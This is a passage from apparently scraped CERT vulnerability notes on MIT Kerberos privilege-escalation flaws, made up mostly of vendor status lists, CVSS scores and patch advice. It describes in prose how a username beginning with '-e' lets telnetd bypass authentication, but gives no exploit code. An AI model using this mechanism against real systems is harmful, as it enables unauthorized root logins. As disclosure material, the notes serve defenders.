\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 45 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>\n * <http://www.die.net/doc/linux/man/man8/kshd.8.html>\n * <http://www.die.net/doc/linux/man/man1/v4rcp.1.html>\n\n### Acknowledgements\n\nThese vulnerabilities were reported by the MIT Kerberos Development Team.\n\nThis document was written by Ryan Giobbi and Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3083](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3083>) \n---|--- \n**Severity Metric:** | 6.91 \n**Date Public:** | 2006-07-26 \n**Date First Published:** | 2006-08-08 \n**Date Last Updated: ** | 2006-08-24 20:07 UTC \n**Document Revision: ** | 42 \n", "cvss3": {}, "published": "2006-08-08T00:00:00", "type": "cert", "title": "MIT Kerberos (krb5) krshd and v4rcp do not properly validate setuid() or seteuid() calls", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-24T20:07:00", "id": "VU:580124", "href": "https://www.kb.cert.org/vuls/id/580124", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:35:15", "description": "### Overview\n\nPrivilege escalation vulnerabilities in MIT krb5 `ftpd` and `ksu` may allow an authenticated attacker to execute arbitrary code.\n\n### Description\n\nThe MIT krb 5 `ftpd` and `ksu` programs contain multiple privilege escalation vulnerabilities. \n\nThese vulnerabilities are dependent on the host operating system's implementation of the `seteuid()` system call and result when `seteuid()` can fail due to resource exhaustion while changing to an unprivileged user ID. Some implementations of `seteuid()` do not expose the vulnerability. \n \nFrom MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>): \n \n_The following vulnerabilities may result from unchecked calls to seteuid(). These vulnerabilities are not yet known to exist on any operating system:_ \n\n\n * _ Unchecked calls to seteuid() in ftpd may allow a local privilege escalation leading to reading, writing, or creating files as root._\n * _Unchecked calls to seteuid() in the ksu program may allow a local privilege escalation resulting in filling a file with null bytes as root and then deleting it (the \"kdestroy\" operation)._ \n--- \n \n### Impact\n\nAn authenticated attacker may be able to execute arbitrary code with root privileges. \n \n--- \n \n### Solution\n\n**Upgrade**The MIT Kerberos team has released an [update](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>) to address these issues. See the Systems Affected section of this document for information about specific vendors. Users who compile Kerberos from the original source distribution should see [MIT krb5 Security Advisory 2006-00](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>)1 for more details. \n \n--- \n \n \n**Disable vulnerable programs** \n \nFrom MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>): \"Disable `krshd` and `ftpd`, and remove the setuid bit from the `ksu` binary and the `v4rcp` binary.\" \n \n--- \n \n### Vendor Information\n\n401660\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: July 28, 2006 Updated: August 24, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Gentoo Linux [Security Advisory GLSA 200608-15](<http://www.gentoo.org/security/en/glsa/glsa-200608-15.xml>) for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23401660 Feedback>).\n\n### MIT Kerberos Development Team __ Affected\n\nNotified: July 27, 2006 Updated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23401660 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: July 28, 2006 Updated: August 24, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Mandrivia advisory [MDKSA-2006:139](<http://www.mandriva.com/security/advisories?name=MDKSA-2006:139>) for more details. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23401660 Feedback>).\n\n### Apple Computer, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 18, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMac OS X and Mac OS X Server are not susceptible to the issues described in this vulnerability note.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AttachmateWRQ, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 23, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNo versions of the Attachmate Reflection Kerberos Client are subject to these privilege escalation vulnerabilities. The Reflection Kerberos Client is not based on the MIT code base and runs only on Microsoft Windows operating systems.\n\nFor the latest Attachmate security update information, Attachmate recommends you regularly check the Security Updates and Reflection web page at: <http://support.wrq.com/techdocs/1708.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation __ Not Affected\n\nNotified: July 28, 2006 Updated: August 08, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nKerberos is available for AIX via Network Authentication Service. Network Authentication Service is not affected by the issues mentioned in CERT Vulnerability Notes VU#580124 (CVE-2006-3083) and VU#401660 (CVE-2006-3084).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 08, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CyberSafe, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: July 28, 2006 Updated: August 24, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nSee [Debian Security Advisory DSA-1146-1](<http://www.us.debian.org/security/2006/dsa-1146>) for more details.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Heimdal Kerberos Project Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 46 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>\n\n### Acknowledgements\n\nThanks to the MIT Kerberos Team for reporting this issue. The MIT Kerberos Team in turn thanks Michael Calmer and Marcus Meissner at SUSE and Shiva Persaud at IBM for providing information about AIX.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3084](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3084>) \n---|--- \n**Severity Metric:** | 2.33 \n**Date Public:** | 2006-07-26 \n**Date First Published:** | 2006-08-15 \n**Date Last Updated: ** | 2006-08-16 13:36 UTC \n**Document Revision: ** | 40 \n", "cvss3": {}, "published": "2006-08-15T00:00:00", "type": "cert", "title": "MIT Kerberos (krb5) ftpd and ksu do not properly validate seteuid() calls", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-16T13:36:00", "id": "VU:401660", "href": "https://www.kb.cert.org/vuls/id/401660", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:34:44", "description": "### Overview\n\nA vulnerability exists in the version of the telnet daemon included with the MIT Kerberos 5 distribution that may allow a remote, unauthorized attacker to log on to the system with elevated privileges.\n\n### Description\n\nA vulnerability exists version of the telnet daemon included with the MIT Kerberos 5 distribution that may allow a remote, unauthenticated user to login as any valid user, including root. According to MIT krb5 Security Advisory [MITKRB5-SA-2007-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt>):\n\n_The MIT krb5 telnet daemon fails to adequately check the provided username. A malformed username beginning with \"-e\" can be interpreted as a command-line flag by the login.krb5 program, which is executed by telnetd. This causes login.krb5 to execute part of the BSD rlogin protocol, where an arbitrary username may be injected, allowing login as that user without a password or any further authentication._ \nNote that this issue affects all releases of MIT krb5 up to and including krb5-1.6. \n \n--- \n \n### Impact\n\nA remote attacker could log on to a vulnerable system via telnet with elevated privileges. This impact is limited to authenticated users if the telnet daemon is configured to only allow authenticated login. \n \n--- \n \n### Solution\n\n**Apply Patch** \nA patch can be obtained from MIT krb5 Security Advisory [MITKRB5-SA-2007-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt>). MIT also states that this will be addressed in the upcoming krb5-1.6.1 release. \n \n--- \n \n### Vendor Information\n\n220816\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian GNU/Linux __ Affected\n\nUpdated: April 04, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Debian Security Advisory [DSA 1276-1](<http://www.debian.org/security/2007/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Fedora Project __ Affected\n\nNotified: March 21, 2007 Updated: April 12, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Fedora Project ships the krb5 telnet daemon in all versions of Fedora Core. Updated packages to correct this issue are available for Fedora Core 5 and 6 along with our advisories at the URLs below:\n\nFedora Core 6: \n<https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00008.html> \n \nFedora Core 5: \n<https://www.redhat.com/archives/fedora-package-announce/2007-April/msg00009.html> \n \nThis update can also be installed with the 'yum' update program. \n \nNote that the krb5 telnet daemon is not enabled by default in any version of Fedora Core. In addition, the default firewall rules block remote access to the telnet port. This flaw does not affect the telnet daemon distributed in the telnet-server package.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux __ Affected\n\nNotified: March 21, 2007 Updated: April 04, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to GLSA [200704-02](<http://www.gentoo.org/security/en/glsa/glsa-200704-02.xml>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### MIT Kerberos Development Team __ Affected\n\nNotified: March 21, 2007 Updated: April 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MITKRB5-SA-2007-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: March 21, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MDKSA-2007:077](<http://www.mandriva.com/security/advisories?name=MDKSA-2007:077>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nNotified: March 21, 2007 Updated: April 04, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRed Hat ships the krb5 telnet daemon in all versions of Red Hat Enterprise Linux. Updated packages to correct this issue are available along with our advisory at the URL below, and automatically via the Red Hat Network:\n\n<https://rhn.redhat.com/errata/RHSA-2007-0095.html> \n \nNote that the krb5 telnet daemon is not enabled by default in any version of Red Hat Enterprise Linux. In addition, the default firewall rules block remote access to the telnet port. This flaw does not affect the telnet daemon distributed in the telnet-server package.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [RHSA-2007-0095](<https://rhn.redhat.com/errata/RHSA-2007-0095.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: March 21, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [SUSE-SA:2007:025](<http://lists.suse.com/archive/suse-security-announce/2007-Apr/0001.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: March 21, 2007 Updated: April 23, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun Enterprise Authentication Mechanism (SEAM) is affected, please see <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102867-1>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Trustix Secure Linux __ Affected\n\nNotified: March 21, 2007 Updated: April 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Trustix Secure Linux Security Advisory [#2007-0012](<http://www.trustix.org/errata/2007/0012/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: March 21, 2007 Updated: April 04, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Ubuntu Security Notice [USN-449-1](<http://www.ubuntu.com/usn/usn-449-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### rPath __ Affected\n\nUpdated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [rPSA-2007-0063-1](<http://lists.rpath.com/pipermail/security-announce/2007-April/000167.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23220816 Feedback>).\n\n### AttachmateWRQ, Inc. Not Affected\n\nNotified: March 21, 2007 Updated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CyberSafe, Inc. __ Not Affected\n\nNotified: March 21, 2007 Updated: March 22, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor 